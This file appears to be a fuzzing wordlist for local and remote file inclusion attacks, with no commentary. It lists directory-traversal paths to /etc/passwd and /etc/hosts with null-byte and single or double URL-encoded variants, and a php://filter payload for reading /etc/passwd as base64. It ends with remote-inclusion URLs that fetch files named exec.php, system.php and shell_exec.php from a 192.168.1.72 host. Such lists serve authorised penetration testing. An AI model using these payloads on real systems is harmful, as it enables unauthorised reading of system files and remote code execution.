test
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../..etc/passwd
../../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../..etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
/etc/hosts
../etc/hosts
../../etc/hosts
../../../etc/hosts
../../../../etc/hosts
../../../../etc/hosts
../../../../../etc/hosts
../../../../../../etc/hosts
../../../../../../../etc/hosts
../../../../../../../../etc/hosts
../../../../../../../../../etc/hosts
../../../../../../../../../../etc/hosts
../../../../../../../../../../..etc/hosts
../../../../../../../../../../../../etc/hosts
/etc/hosts%00
../etc/hosts%00
../../etc/hosts%00
../../../etc/hosts%00
../../../../etc/hosts%00
../../../../etc/hosts%00
../../../../../etc/hosts%00
../../../../../../etc/hosts%00
../../../../../../../../etc/hosts%00
../../../../../../../../../etc/hosts%00
../../../../../../../../../../etc/hosts%00
../../../../../../../../../../..etc/hosts%00
../../../../../../../../../../../../etc/hosts%00
%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd
%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpasswd%00
%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts
%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhosts%00
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd%00
%252e%252e%252fetc%252fhosts
%252e%252e%252fetc%252fhosts%00
%252e%252e%252f%252e%252e%252fetc%252fhosts
%252e%252e%252f%252e%252e%252fetc%252fhosts%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts
%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhosts%00
php://filter/convert.base64-encode/resource=/etc/passwd
http://192.168.1.72/exec.php
http://192.168.1.72/exec.php%00
http://192.168.1.72/exec.txt
http://192.168.1.72/exec.txt%00
http://192.168.1.72/execBlind.php
http://192.168.1.72/execBlind.php%00
http://192.168.1.72/execBlind.txt
http://192.168.1.72/execBlind.txt%00
http://192.168.1.72/passthru.php
http://192.168.1.72/passthru.php%00
http://192.168.1.72/passthru.txt
http://192.168.1.72/passthru.txt%00
http://192.168.1.72/passthruBlind.php
http://192.168.1.72/passthruBlind.php%00
http://192.168.1.72/passthruBlind.txt
http://192.168.1.72/passthruBlind.txt%00
http://192.168.1.72/shell_exec.php
http://192.168.1.72/shell_exec.php%00
http://192.168.1.72/shell_exec.txt
http://192.168.1.72/shell_exec.txt%00
http://192.168.1.72/shell_execBlind.php
http://192.168.1.72/shell_execBlind.php%00
http://192.168.1.72/shell_execBlind.txt
http://192.168.1.72/shell_execBlind.txt%00
http://192.168.1.72/system.php
http://192.168.1.72/system.php%00
http://192.168.1.72/system.txt
http://192.168.1.72/system.txt%00
http://192.168.1.72/system_Blind.php
http://192.168.1.72/system_Blind.php%00
http://192.168.1.72/system_Blind.txt
http://192.168.1.72/system_Blind.txt%00
